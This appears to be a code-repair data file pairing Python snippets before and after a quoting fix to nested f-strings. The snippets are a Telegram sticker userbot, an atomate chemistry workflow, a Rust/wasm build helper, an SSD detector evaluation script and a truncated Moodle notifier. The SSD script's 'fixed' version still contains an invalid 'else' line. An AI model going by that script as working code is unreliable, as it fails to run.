await event.edit("`This is not a sticker. Reply to a sticker.`")
return
get_stickerset = await bot(
GetStickerSetRequest(
InputStickerSetID(
id=stickerset_attr.stickerset.id,
access_hash=stickerset_attr.stickerset.access_hash)))
pack_emojis = []
for document_sticker in get_stickerset.packs:
if document_sticker.emoticon not in pack_emojis:
pack_emojis.append(document_sticker.emoticon)
OUTPUT = f"**Sticker Title:** `{get_stickerset.set.title}\n`" \
f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" \
f"**Official:** `{get_stickerset.set.official}`\n" \
f"**Archived:** `{get_stickerset.set.archived}`\n" \
f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" \
f"**Emojis In Pack:**\n{' '.join(pack_emojis)}"
await event.edit(OUTPUT)
@register(outgoing=True, pattern="^\.get$")
async def sticker_to_png(sticker):
if not sticker.is_reply:
await sticker.edit("`NULL information to fetch...`")
return False
img = await sticker.get_reply_message()
if not img.document:
await sticker.edit("`Reply to a sticker...`")
return False
try:
img.document.attributes[1]
except Exception:
await sticker.edit("`This is not a sticker...`")
return
with io.BytesIO() as image:
await sticker.client.download_media(img, image)
image.name = 'sticker.png'
image.seek(0)
try:
await img.reply(file=image, force_document=True)
except Exception:
await sticker.edit("`Err, can't send file...`")
else:
await sticker.delete()
return
CMD_HELP.update({
"stickers":
">`.curry [emoji('s)]?`"
"\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack "
"\nor specify the emoji you want to."
"\n\n>`.curry (emoji['s]]?` [number]?"
"\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji "
"or choose the emoji you want to."
"\n\n>`.stkrinfo`"
"\nUsage: Gets info about the sticker pack."
"\n\n>`.get`"
"\nUsage: reply to a sticker to get 'PNG' file of sticker."
})
|
# This module defines a workflow for FFopting a molecule and then analyzing its
# electron density critical points with Critic2.
from fireworks import Workflow
from atomate.qchem.fireworks.core import CubeAndCritic2FW, FrequencyFlatteningOptimizeFW
from atomate.utils.utils import get_logger
__author__ = "Samuel Blau"
__copyright__ = "Copyright 2019, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Samuel Blau"
__email__ = "samblau1@gmail.com"
__status__ = "Alpha"
__date__ = "11/20/19"
logger = get_logger(__name__)
def get_wf_FFopt_and_critic(
molecule, suffix, qchem_input_params=None, db_file=">>db_file<<", **kwargs
):
"""
Firework 1 : write QChem input for an FF optimization,
run FF_opt QCJob,
parse directory and insert into db,
pass relaxed molecule to fw_spec and on to fw2,
Firework 2 : write QChem input for a single point calc to print a cube file
run SP QCJob, thereby printing a cube file
run Critic2 on the printed cube file
parse directory and insert into db
Args:
molecule (Molecule): input molecule to be optimized and run.
suffix (str): Workflow naming suffix
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For instance,
if a user wanted to use a more advanced DFT functional, include a pcm with a
dielectric of 30, and use a larger basis, the user would set qchem_input_params =
{"dft_rung": 5, "pcm_dielectric": 30, "basis_set": "6-311++g**"}. However, more
advanced customization of the input is also possible through the overwrite_inputs
key which allows the user to directly modify the rem, pcm, smd, and solvent
dictionaries that QChemDictSet passes to inputs.py to print an actual input file.
For instance, if a user wanted to set the sym_ignore flag in the rem section of the
input file to true, then they would set qchem_input_params = {"overwrite_inputs":
"rem": {"sym_ignore": "true"}}. Of course, overwrite_inputs could be used in
conjunction with more typical modifications, as seen in the test_double_FF_opt
workflow test.
db_file (str): path to file containing the database credentials.
kwargs (keyword arguments): additional kwargs to be passed to Workflow
Returns:
Workflow
"""
qchem_input_params = qchem_input_params or {}
# FFopt
fw1 = FrequencyFlatteningOptimizeFW(
molecule=molecule,
name=f"{molecule.composition.alphabetical_formula}:{"FFopt_" + suffix}",
qchem_cmd=">>qchem_cmd<<",
max_cores=">>max_cores<<",
qchem_input_params=qchem_input_params,
linked=True,
db_file=">>db_file<<",
)
# Critic
fw2 = CubeAndCritic2FW(
name=f"{molecule.composition.alphabetical_formula}:{"CC2_" + suffix}",
qchem_cmd=">>qchem_cmd<<",
max_cores=">>max_cores<<",
qchem_input_params=qchem_input_params,
db_file=">>db_file<<",
parents=fw1,
)
fws = [fw1, fw2]
wfname = f"{molecule.composition.alphabetical_formula}:{"FFopt_CC2_WF_" + suffix}"
return Workflow(fws, name=wfname, **kwargs)
| # This module defines a workflow for FFopting a molecule and then analyzing its
# electron density critical points with Critic2.
from fireworks import Workflow
from atomate.qchem.fireworks.core import CubeAndCritic2FW, FrequencyFlatteningOptimizeFW
from atomate.utils.utils import get_logger
__author__ = "Samuel Blau"
__copyright__ = "Copyright 2019, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Samuel Blau"
__email__ = "samblau1@gmail.com"
__status__ = "Alpha"
__date__ = "11/20/19"
logger = get_logger(__name__)
def get_wf_FFopt_and_critic(
molecule, suffix, qchem_input_params=None, db_file=">>db_file<<", **kwargs
):
"""
Firework 1 : write QChem input for an FF optimization,
run FF_opt QCJob,
parse directory and insert into db,
pass relaxed molecule to fw_spec and on to fw2,
Firework 2 : write QChem input for a single point calc to print a cube file
run SP QCJob, thereby printing a cube file
run Critic2 on the printed cube file
parse directory and insert into db
Args:
molecule (Molecule): input molecule to be optimized and run.
suffix (str): Workflow naming suffix
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For instance,
if a user wanted to use a more advanced DFT functional, include a pcm with a
dielectric of 30, and use a larger basis, the user would set qchem_input_params =
{"dft_rung": 5, "pcm_dielectric": 30, "basis_set": "6-311++g**"}. However, more
advanced customization of the input is also possible through the overwrite_inputs
key which allows the user to directly modify the rem, pcm, smd, and solvent
dictionaries that QChemDictSet passes to inputs.py to print an actual input file.
For instance, if a user wanted to set the sym_ignore flag in the rem section of the
input file to true, then they would set qchem_input_params = {"overwrite_inputs":
"rem": {"sym_ignore": "true"}}. Of course, overwrite_inputs could be used in
conjunction with more typical modifications, as seen in the test_double_FF_opt
workflow test.
db_file (str): path to file containing the database credentials.
kwargs (keyword arguments): additional kwargs to be passed to Workflow
Returns:
Workflow
"""
qchem_input_params = qchem_input_params or {}
# FFopt
fw1 = FrequencyFlatteningOptimizeFW(
molecule=molecule,
name=f"{molecule.composition.alphabetical_formula}:{'FFopt_' + suffix}",
qchem_cmd=">>qchem_cmd<<",
max_cores=">>max_cores<<",
qchem_input_params=qchem_input_params,
linked=True,
db_file=">>db_file<<",
)
# Critic
fw2 = CubeAndCritic2FW(
name=f"{molecule.composition.alphabetical_formula}:{'CC2_' + suffix}",
qchem_cmd=">>qchem_cmd<<",
max_cores=">>max_cores<<",
qchem_input_params=qchem_input_params,
db_file=">>db_file<<",
parents=fw1,
)
fws = [fw1, fw2]
wfname = f"{molecule.composition.alphabetical_formula}:{'FFopt_CC2_WF_' + suffix}"
return Workflow(fws, name=wfname, **kwargs)
|
import itertools
import json
import logging
import os
import platform
import shutil
import subprocess
import textwrap
from argparse import ArgumentParser
from pathlib import Path
from subprocess import PIPE
def main() -> None:
parser = ArgumentParser()
parser.add_argument('--toolchain')
parser.add_argument('--proc-macro2-rev', nargs='?', default=None)
parser.add_argument('build_dependencies', nargs='+')
args = parser.parse_args()
logger = logging.getLogger()
env = os.environ.copy()
if args.toolchain:
rustup_exe = shutil.which('rustup')
if rustup_exe is None:
raise Exception('`rustup` not found')
env['CARGO'] = subprocess.run(
[rustup_exe, 'which', 'cargo', '--toolchain', args.toolchain],
stdout=PIPE, check=True,
).stdout.decode()
cargo_command = [rustup_exe, 'run', args.toolchain, 'cargo']
else:
if Path(os.environ['CARGO']).stem != 'cargo':
cargo_exe = str(Path(os.environ['CARGO']).with_stem('cargo'))
if not Path(cargo_exe).exists():
which_cargo = shutil.which('cargo')
if which_cargo is None:
raise Exception('`cargo` not found')
cargo_exe = which_cargo
logger.warning(f'`{os.environ['CARGO']}` → `{cargo_exe}`')
env['CARGO'] = cargo_exe
cargo_command = [env['CARGO']]
workdir = cache_dir() / 'wattbuild'
workdir.mkdir(parents=True, exist_ok=True)
if args.proc_macro2_rev is None:
rev = ''
else:
rev = f', rev = "{args.proc_macro2_rev}"'
manifest = textwrap.dedent(
f'''\
[workspace]
[patch.crates-io]
proc-macro2 = {{ git = "https://github.com/dtolnay/watt"{rev} }}
[package]
name = "wattbuild-build"
version = "0.0.0"
edition = "2018"
[build-dependencies]
'''
)
for i, value in enumerate(args.build_dependencies):
manifest += f'_{i} = {value}\n'
with open(workdir / 'Cargo.toml', 'w') as file:
file.write(manifest)
(workdir / 'src').mkdir(exist_ok=True)
with open(workdir / 'src' / 'lib.rs', 'w') as file:
file.write('')
subprocess.run([*cargo_command, 'update'],
cwd=workdir, env=env, check=True)
metadata = json.loads(subprocess.run(
[*cargo_command, 'metadata', '--format-version', '1'],
stdout=PIPE, cwd=workdir, env=env, check=True,
).stdout.decode())
node = next(node for node in metadata['resolve']['nodes']
if node['id'] == metadata['resolve']['root'])
build_dependencies = [package for package in metadata['packages']
if package['id'] in node['dependencies']]
subprocess.run(
[*cargo_command, 'build', '--release',
*itertools.chain.from_iterable(
['-p', f'{package['name']}:{package['version']}']
for package in build_dependencies
),
'--target', 'wasm32-unknown-unknown'],
stdout=PIPE, cwd=workdir, env=env, check=True,
)
for path in Path(metadata['target_directory'], 'wasm32-unknown-unknown',
'release').glob('*.wasm'):
shutil.copy(path, os.environ['OUT_DIR'])
def cache_dir() -> Path:
system = platform.uname().system
home = Path(os.path.expanduser('~'))
if system == 'Windows':
if 'APPDATA' in os.environ:
return Path(os.environ['APPDATA'], 'Local')
return home / 'AppData' / 'Local'
if system == 'Darwin':
return home / 'Library' / 'Caches'
if 'XDG_CACHE_DIR' in os.environ:
return Path(os.environ['XDG_CACHE_DIR'])
return home / '.cache'
if __name__ == '__main__':
main()
| import itertools
import json
import logging
import os
import platform
import shutil
import subprocess
import textwrap
from argparse import ArgumentParser
from pathlib import Path
from subprocess import PIPE
def main() -> None:
parser = ArgumentParser()
parser.add_argument('--toolchain')
parser.add_argument('--proc-macro2-rev', nargs='?', default=None)
parser.add_argument('build_dependencies', nargs='+')
args = parser.parse_args()
logger = logging.getLogger()
env = os.environ.copy()
if args.toolchain:
rustup_exe = shutil.which('rustup')
if rustup_exe is None:
raise Exception('`rustup` not found')
env['CARGO'] = subprocess.run(
[rustup_exe, 'which', 'cargo', '--toolchain', args.toolchain],
stdout=PIPE, check=True,
).stdout.decode()
cargo_command = [rustup_exe, 'run', args.toolchain, 'cargo']
else:
if Path(os.environ['CARGO']).stem != 'cargo':
cargo_exe = str(Path(os.environ['CARGO']).with_stem('cargo'))
if not Path(cargo_exe).exists():
which_cargo = shutil.which('cargo')
if which_cargo is None:
raise Exception('`cargo` not found')
cargo_exe = which_cargo
logger.warning(f'`{os.environ["CARGO"]}` → `{cargo_exe}`')
env['CARGO'] = cargo_exe
cargo_command = [env['CARGO']]
workdir = cache_dir() / 'wattbuild'
workdir.mkdir(parents=True, exist_ok=True)
if args.proc_macro2_rev is None:
rev = ''
else:
rev = f', rev = "{args.proc_macro2_rev}"'
manifest = textwrap.dedent(
f'''\
[workspace]
[patch.crates-io]
proc-macro2 = {{ git = "https://github.com/dtolnay/watt"{rev} }}
[package]
name = "wattbuild-build"
version = "0.0.0"
edition = "2018"
[build-dependencies]
'''
)
for i, value in enumerate(args.build_dependencies):
manifest += f'_{i} = {value}\n'
with open(workdir / 'Cargo.toml', 'w') as file:
file.write(manifest)
(workdir / 'src').mkdir(exist_ok=True)
with open(workdir / 'src' / 'lib.rs', 'w') as file:
file.write('')
subprocess.run([*cargo_command, 'update'],
cwd=workdir, env=env, check=True)
metadata = json.loads(subprocess.run(
[*cargo_command, 'metadata', '--format-version', '1'],
stdout=PIPE, cwd=workdir, env=env, check=True,
).stdout.decode())
node = next(node for node in metadata['resolve']['nodes']
if node['id'] == metadata['resolve']['root'])
build_dependencies = [package for package in metadata['packages']
if package['id'] in node['dependencies']]
subprocess.run(
[*cargo_command, 'build', '--release',
*itertools.chain.from_iterable(
['-p', f'{package["name"]}:{package["version"]}']
for package in build_dependencies
),
'--target', 'wasm32-unknown-unknown'],
stdout=PIPE, cwd=workdir, env=env, check=True,
)
for path in Path(metadata['target_directory'], 'wasm32-unknown-unknown',
'release').glob('*.wasm'):
shutil.copy(path, os.environ['OUT_DIR'])
def cache_dir() -> Path:
system = platform.uname().system
home = Path(os.path.expanduser('~'))
if system == 'Windows':
if 'APPDATA' in os.environ:
return Path(os.environ['APPDATA'], 'Local')
return home / 'AppData' / 'Local'
if system == 'Darwin':
return home / 'Library' / 'Caches'
if 'XDG_CACHE_DIR' in os.environ:
return Path(os.environ['XDG_CACHE_DIR'])
return home / '.cache'
if __name__ == '__main__':
main()
|
import torch
from vision.ssd.vgg_ssd import create_vgg_ssd, create_vgg_ssd_predictor
from vision.ssd.mobilenetv1_ssd import create_mobilenetv1_ssd, create_mobilenetv1_ssd_predictor
from vision.ssd.mobilenetv1_ssd_lite import create_mobilenetv1_ssd_lite, create_mobilenetv1_ssd_lite_predictor
from vision.ssd.squeezenet_ssd_lite import create_squeezenet_ssd_lite, create_squeezenet_ssd_lite_predictor
from vision.datasets.voc_dataset import VOCDataset
from vision.datasets.open_images import OpenImagesDataset
from vision.utils import box_utils, measurements
from vision.utils.misc import str2bool, Timer
from vision.datasets.piap_dataset import PIAPDataset
import argparse
import pathlib
import numpy as np
import logging
import sys
from vision.ssd.mobilenet_v2_ssd_lite import create_mobilenetv2_ssd_lite, create_mobilenetv2_ssd_lite_predictor
parser = argparse.ArgumentParser(description="SSD Evaluation on VOC Dataset.")
parser.add_argument('--net', default="vgg16-ssd",
help="The network architecture, it should be of mb1-ssd, mb1-ssd-lite, mb2-ssd-lite or vgg16-ssd.")
parser.add_argument("--trained_model", type=str)
parser.add_argument("--dataset_type", default="voc", type=str,
help='Specify dataset type. Currently support voc and open_images.')
parser.add_argument("--dataset", type=str, help="The root directory of the VOC dataset or Open Images dataset.")
parser.add_argument("--label_file", type=str, help="The label file path.")
parser.add_argument("--use_cuda", type=str2bool, default=True)
parser.add_argument("--use_2007_metric", type=str2bool, default=True)
parser.add_argument("--nms_method", type=str, default="hard")
parser.add_argument("--iou_threshold", type=float, default=0.5, help="The threshold of Intersection over Union.")
parser.add_argument("--eval_dir", default="eval_results", type=str, help="The directory to store evaluation results.")
parser.add_argument('--mb2_width_mult', default=1.0, type=float,
help='Width Multiplifier for MobilenetV2')
args = parser.parse_args()
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() and args.use_cuda else "cpu")
def group_annotation_by_class(dataset):
true_case_stat = {}
all_gt_boxes = {}
all_difficult_cases = {}
for i in range(len(dataset)):
image_id, annotation = dataset.get_annotation(i)
gt_boxes, classes, is_difficult = annotation
gt_boxes = torch.from_numpy(gt_boxes)
for i, difficult in enumerate(is_difficult):
class_index = int(classes[i])
gt_box = gt_boxes[i]
if not difficult:
true_case_stat[class_index] = true_case_stat.get(class_index, 0) + 1
if class_index not in all_gt_boxes:
all_gt_boxes[class_index] = {}
if image_id not in all_gt_boxes[class_index]:
all_gt_boxes[class_index][image_id] = []
all_gt_boxes[class_index][image_id].append(gt_box)
if class_index not in all_difficult_cases:
all_difficult_cases[class_index]={}
if image_id not in all_difficult_cases[class_index]:
all_difficult_cases[class_index][image_id] = []
all_difficult_cases[class_index][image_id].append(difficult)
for class_index in all_gt_boxes:
for image_id in all_gt_boxes[class_index]:
all_gt_boxes[class_index][image_id] = torch.stack(all_gt_boxes[class_index][image_id])
for class_index in all_difficult_cases:
for image_id in all_difficult_cases[class_index]:
all_gt_boxes[class_index][image_id] = torch.tensor(all_gt_boxes[class_index][image_id])
return true_case_stat, all_gt_boxes, all_difficult_cases
def compute_average_precision_per_class(num_true_cases, gt_boxes, difficult_cases,
prediction_file, iou_threshold, use_2007_metric):
with open(prediction_file) as f:
image_ids = []
boxes = []
scores = []
for line in f:
t = line.rstrip().split(" ")
image_ids.append(t[0])
scores.append(float(t[1]))
box = torch.tensor([float(v) for v in t[2:]]).unsqueeze(0)
box -= 1.0 # convert to python format where indexes start from 0
boxes.append(box)
scores = np.array(scores)
sorted_indexes = np.argsort(-scores)
boxes = [boxes[i] for i in sorted_indexes]
image_ids = [image_ids[i] for i in sorted_indexes]
true_positive = np.zeros(len(image_ids))
false_positive = np.zeros(len(image_ids))
matched = set()
for i, image_id in enumerate(image_ids):
box = boxes[i]
if image_id not in gt_boxes:
false_positive[i] = 1
continue
gt_box = gt_boxes[image_id]
ious = box_utils.iou_of(box, gt_box)
max_iou = torch.max(ious).item()
max_arg = torch.argmax(ious).item()
if max_iou > iou_threshold:
if difficult_cases[image_id][max_arg] == 0:
if (image_id, max_arg) not in matched:
true_positive[i] = 1
matched.add((image_id, max_arg))
else:
false_positive[i] = 1
else:
false_positive[i] = 1
true_positive = true_positive.cumsum()
false_positive = false_positive.cumsum()
precision = true_positive / (true_positive + false_positive)
recall = true_positive / num_true_cases
if use_2007_metric:
return measurements.compute_voc2007_average_precision(precision, recall)
else:
return measurements.compute_average_precision(precision, recall)
if __name__ == '__main__':
eval_path = pathlib.Path(args.eval_dir)
eval_path.mkdir(exist_ok=True)
timer = Timer()
class_names = [name.strip() for name in open(args.label_file).readlines()]
if args.dataset_type == "voc":
dataset = VOCDataset(args.dataset, is_test=True)
elif args.dataset_type == 'open_images':
dataset = OpenImagesDataset(args.dataset, dataset_type="test")
else args.dataset_type == 'piap':
dataset = PIAPDataset(args.dataset, is_test=True)
true_case_stat, all_gb_boxes, all_difficult_cases = group_annotation_by_class(dataset)
if args.net == 'vgg16-ssd':
net = create_vgg_ssd(len(class_names), is_test=True)
elif args.net == 'mb1-ssd':
net = create_mobilenetv1_ssd(len(class_names), is_test=True)
elif args.net == 'mb1-ssd-lite':
net = create_mobilenetv1_ssd_lite(len(class_names), is_test=True)
elif args.net == 'sq-ssd-lite':
net = create_squeezenet_ssd_lite(len(class_names), is_test=True)
elif args.net == 'mb2-ssd-lite':
net = create_mobilenetv2_ssd_lite(len(class_names), width_mult=args.mb2_width_mult, is_test=True)
else:
logging.fatal("The net type is wrong. It should be one of vgg16-ssd, mb1-ssd and mb1-ssd-lite.")
parser.print_help(sys.stderr)
sys.exit(1)
timer.start("Load Model")
net.load(args.trained_model)
net = net.to(DEVICE)
print(f'It took {timer.end('Load Model')} seconds to load the model.')
if args.net == 'vgg16-ssd':
predictor = create_vgg_ssd_predictor(net, nms_method=args.nms_method, device=DEVICE)
elif args.net == 'mb1-ssd':
predictor = create_mobilenetv1_ssd_predictor(net, nms_method=args.nms_method, device=DEVICE)
elif args.net == 'mb1-ssd-lite':
predictor = create_mobilenetv1_ssd_lite_predictor(net, nms_method=args.nms_method, device=DEVICE)
elif args.net == 'sq-ssd-lite':
predictor = create_squeezenet_ssd_lite_predictor(net,nms_method=args.nms_method, device=DEVICE)
elif args.net == 'mb2-ssd-lite':
predictor = create_mobilenetv2_ssd_lite_predictor(net, nms_method=args.nms_method, device=DEVICE)
else:
logging.fatal("The net type is wrong. It should be one of vgg16-ssd, mb1-ssd and mb1-ssd-lite.")
parser.print_help(sys.stderr)
sys.exit(1)
results = []
for i in range(len(dataset)):
print("process image", i)
timer.start("Load Image")
image = dataset.get_image(i)
print("Load Image: {:4f} seconds.".format(timer.end("Load Image")))
timer.start("Predict")
boxes, labels, probs = predictor.predict(image)
print("Prediction: {:4f} seconds.".format(timer.end("Predict")))
indexes = torch.ones(labels.size(0), 1, dtype=torch.float32) * i
results.append(torch.cat([
indexes.reshape(-1, 1),
labels.reshape(-1, 1).float(),
probs.reshape(-1, 1),
boxes + 1.0 # matlab's indexes start from 1
], dim=1))
results = torch.cat(results)
for class_index, class_name in enumerate(class_names):
if class_index == 0: continue # ignore background
prediction_path = eval_path / f"det_test_{class_name}.txt"
with open(prediction_path, "w") as f:
sub = results[results[:, 1] == class_index, :]
for i in range(sub.size(0)):
prob_box = sub[i, 2:].numpy()
image_id = dataset.ids[int(sub[i, 0])]
print(
image_id + " " + " ".join([str(v) for v in prob_box]),
file=f
)
aps = []
print("\n\nAverage Precision Per-class:")
for class_index, class_name in enumerate(class_names):
if class_index == 0:
continue
prediction_path = eval_path / f"det_test_{class_name}.txt"
ap = compute_average_precision_per_class(
true_case_stat[class_index],
all_gb_boxes[class_index],
all_difficult_cases[class_index],
prediction_path,
args.iou_threshold,
args.use_2007_metric
)
aps.append(ap)
print(f"{class_name}: {ap}")
print(f"\nAverage Precision Across All Classes:{sum(aps)/len(aps)}")
| import torch
from vision.ssd.vgg_ssd import create_vgg_ssd, create_vgg_ssd_predictor
from vision.ssd.mobilenetv1_ssd import create_mobilenetv1_ssd, create_mobilenetv1_ssd_predictor
from vision.ssd.mobilenetv1_ssd_lite import create_mobilenetv1_ssd_lite, create_mobilenetv1_ssd_lite_predictor
from vision.ssd.squeezenet_ssd_lite import create_squeezenet_ssd_lite, create_squeezenet_ssd_lite_predictor
from vision.datasets.voc_dataset import VOCDataset
from vision.datasets.open_images import OpenImagesDataset
from vision.utils import box_utils, measurements
from vision.utils.misc import str2bool, Timer
from vision.datasets.piap_dataset import PIAPDataset
import argparse
import pathlib
import numpy as np
import logging
import sys
from vision.ssd.mobilenet_v2_ssd_lite import create_mobilenetv2_ssd_lite, create_mobilenetv2_ssd_lite_predictor
parser = argparse.ArgumentParser(description="SSD Evaluation on VOC Dataset.")
parser.add_argument('--net', default="vgg16-ssd",
help="The network architecture, it should be of mb1-ssd, mb1-ssd-lite, mb2-ssd-lite or vgg16-ssd.")
parser.add_argument("--trained_model", type=str)
parser.add_argument("--dataset_type", default="voc", type=str,
help='Specify dataset type. Currently support voc and open_images.')
parser.add_argument("--dataset", type=str, help="The root directory of the VOC dataset or Open Images dataset.")
parser.add_argument("--label_file", type=str, help="The label file path.")
parser.add_argument("--use_cuda", type=str2bool, default=True)
parser.add_argument("--use_2007_metric", type=str2bool, default=True)
parser.add_argument("--nms_method", type=str, default="hard")
parser.add_argument("--iou_threshold", type=float, default=0.5, help="The threshold of Intersection over Union.")
parser.add_argument("--eval_dir", default="eval_results", type=str, help="The directory to store evaluation results.")
parser.add_argument('--mb2_width_mult', default=1.0, type=float,
help='Width Multiplifier for MobilenetV2')
args = parser.parse_args()
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() and args.use_cuda else "cpu")
def group_annotation_by_class(dataset):
true_case_stat = {}
all_gt_boxes = {}
all_difficult_cases = {}
for i in range(len(dataset)):
image_id, annotation = dataset.get_annotation(i)
gt_boxes, classes, is_difficult = annotation
gt_boxes = torch.from_numpy(gt_boxes)
for i, difficult in enumerate(is_difficult):
class_index = int(classes[i])
gt_box = gt_boxes[i]
if not difficult:
true_case_stat[class_index] = true_case_stat.get(class_index, 0) + 1
if class_index not in all_gt_boxes:
all_gt_boxes[class_index] = {}
if image_id not in all_gt_boxes[class_index]:
all_gt_boxes[class_index][image_id] = []
all_gt_boxes[class_index][image_id].append(gt_box)
if class_index not in all_difficult_cases:
all_difficult_cases[class_index]={}
if image_id not in all_difficult_cases[class_index]:
all_difficult_cases[class_index][image_id] = []
all_difficult_cases[class_index][image_id].append(difficult)
for class_index in all_gt_boxes:
for image_id in all_gt_boxes[class_index]:
all_gt_boxes[class_index][image_id] = torch.stack(all_gt_boxes[class_index][image_id])
for class_index in all_difficult_cases:
for image_id in all_difficult_cases[class_index]:
all_gt_boxes[class_index][image_id] = torch.tensor(all_gt_boxes[class_index][image_id])
return true_case_stat, all_gt_boxes, all_difficult_cases
def compute_average_precision_per_class(num_true_cases, gt_boxes, difficult_cases,
prediction_file, iou_threshold, use_2007_metric):
with open(prediction_file) as f:
image_ids = []
boxes = []
scores = []
for line in f:
t = line.rstrip().split(" ")
image_ids.append(t[0])
scores.append(float(t[1]))
box = torch.tensor([float(v) for v in t[2:]]).unsqueeze(0)
box -= 1.0 # convert to python format where indexes start from 0
boxes.append(box)
scores = np.array(scores)
sorted_indexes = np.argsort(-scores)
boxes = [boxes[i] for i in sorted_indexes]
image_ids = [image_ids[i] for i in sorted_indexes]
true_positive = np.zeros(len(image_ids))
false_positive = np.zeros(len(image_ids))
matched = set()
for i, image_id in enumerate(image_ids):
box = boxes[i]
if image_id not in gt_boxes:
false_positive[i] = 1
continue
gt_box = gt_boxes[image_id]
ious = box_utils.iou_of(box, gt_box)
max_iou = torch.max(ious).item()
max_arg = torch.argmax(ious).item()
if max_iou > iou_threshold:
if difficult_cases[image_id][max_arg] == 0:
if (image_id, max_arg) not in matched:
true_positive[i] = 1
matched.add((image_id, max_arg))
else:
false_positive[i] = 1
else:
false_positive[i] = 1
true_positive = true_positive.cumsum()
false_positive = false_positive.cumsum()
precision = true_positive / (true_positive + false_positive)
recall = true_positive / num_true_cases
if use_2007_metric:
return measurements.compute_voc2007_average_precision(precision, recall)
else:
return measurements.compute_average_precision(precision, recall)
if __name__ == '__main__':
eval_path = pathlib.Path(args.eval_dir)
eval_path.mkdir(exist_ok=True)
timer = Timer()
class_names = [name.strip() for name in open(args.label_file).readlines()]
if args.dataset_type == "voc":
dataset = VOCDataset(args.dataset, is_test=True)
elif args.dataset_type == 'open_images':
dataset = OpenImagesDataset(args.dataset, dataset_type="test")
else args.dataset_type == 'piap':
dataset = PIAPDataset(args.dataset, is_test=True)
true_case_stat, all_gb_boxes, all_difficult_cases = group_annotation_by_class(dataset)
if args.net == 'vgg16-ssd':
net = create_vgg_ssd(len(class_names), is_test=True)
elif args.net == 'mb1-ssd':
net = create_mobilenetv1_ssd(len(class_names), is_test=True)
elif args.net == 'mb1-ssd-lite':
net = create_mobilenetv1_ssd_lite(len(class_names), is_test=True)
elif args.net == 'sq-ssd-lite':
net = create_squeezenet_ssd_lite(len(class_names), is_test=True)
elif args.net == 'mb2-ssd-lite':
net = create_mobilenetv2_ssd_lite(len(class_names), width_mult=args.mb2_width_mult, is_test=True)
else:
logging.fatal("The net type is wrong. It should be one of vgg16-ssd, mb1-ssd and mb1-ssd-lite.")
parser.print_help(sys.stderr)
sys.exit(1)
timer.start("Load Model")
net.load(args.trained_model)
net = net.to(DEVICE)
print(f'It took {timer.end("Load Model")} seconds to load the model.')
if args.net == 'vgg16-ssd':
predictor = create_vgg_ssd_predictor(net, nms_method=args.nms_method, device=DEVICE)
elif args.net == 'mb1-ssd':
predictor = create_mobilenetv1_ssd_predictor(net, nms_method=args.nms_method, device=DEVICE)
elif args.net == 'mb1-ssd-lite':
predictor = create_mobilenetv1_ssd_lite_predictor(net, nms_method=args.nms_method, device=DEVICE)
elif args.net == 'sq-ssd-lite':
predictor = create_squeezenet_ssd_lite_predictor(net,nms_method=args.nms_method, device=DEVICE)
elif args.net == 'mb2-ssd-lite':
predictor = create_mobilenetv2_ssd_lite_predictor(net, nms_method=args.nms_method, device=DEVICE)
else:
logging.fatal("The net type is wrong. It should be one of vgg16-ssd, mb1-ssd and mb1-ssd-lite.")
parser.print_help(sys.stderr)
sys.exit(1)
results = []
for i in range(len(dataset)):
print("process image", i)
timer.start("Load Image")
image = dataset.get_image(i)
print("Load Image: {:4f} seconds.".format(timer.end("Load Image")))
timer.start("Predict")
boxes, labels, probs = predictor.predict(image)
print("Prediction: {:4f} seconds.".format(timer.end("Predict")))
indexes = torch.ones(labels.size(0), 1, dtype=torch.float32) * i
results.append(torch.cat([
indexes.reshape(-1, 1),
labels.reshape(-1, 1).float(),
probs.reshape(-1, 1),
boxes + 1.0 # matlab's indexes start from 1
], dim=1))
results = torch.cat(results)
for class_index, class_name in enumerate(class_names):
if class_index == 0: continue # ignore background
prediction_path = eval_path / f"det_test_{class_name}.txt"
with open(prediction_path, "w") as f:
sub = results[results[:, 1] == class_index, :]
for i in range(sub.size(0)):
prob_box = sub[i, 2:].numpy()
image_id = dataset.ids[int(sub[i, 0])]
print(
image_id + " " + " ".join([str(v) for v in prob_box]),
file=f
)
aps = []
print("\n\nAverage Precision Per-class:")
for class_index, class_name in enumerate(class_names):
if class_index == 0:
continue
prediction_path = eval_path / f"det_test_{class_name}.txt"
ap = compute_average_precision_per_class(
true_case_stat[class_index],
all_gb_boxes[class_index],
all_difficult_cases[class_index],
prediction_path,
args.iou_threshold,
args.use_2007_metric
)
aps.append(ap)
print(f"{class_name}: {ap}")
print(f"\nAverage Precision Across All Classes:{sum(aps)/len(aps)}")
|
import requests
import datetime
import time
import os
from lotify.client import Client
def moodle_notify():
lotify = Client()
moodleToken = os.environ.get("MOODLE_TOKEN")
lineToken = os.environ.get("LINE_TOKEN")
url = f"{os.environ.get("MOODLE_URL")}webservice/rest/server.php"
currentTime = int(time.time())
dayTime = 86400
GMT8 = 28800
params = {"moodlewsrestformat": "json",
"wsfunction": "core_webservice_get_site_info", "wstoken": moodleToken}
userId = requests.get(url, params).json()["userid"]
params["wsfunction"] = "core_enrol_get_users_courses"
params["userid"] = userId
courses = requests.get(url, params).json()
params["wsfunction"] = "core_course_get_contents"
params.pop("userid")
typeParams = {"moodlewsrestformat": "json", "wstoken": moodleToken}
for course in courses:
params["courseid"] = course["id"]
courseContent = requests.get(url, params).json()
for i in courseContent:
modules = i["modules"]
for module in modules:
if module.get("contents") == None:
continue
for content in module["contents"]:
if int(content["timemodified"]) >= currentTime-dayTime:
lotify.send_message(
lineToken, f"{course["fullname"]}\n{module["modplural"]}: {module["name"]}\nCheck it on moodle")
# assignments notify
typeParams["wsfunction"] = "mod_assign_get_assignments"
typeParams["courseids[0]"] = course["id"]
assignments = requests.get(url, typeParams).json()[
"courses"][0]["assignments"]
for assingment in assignments:
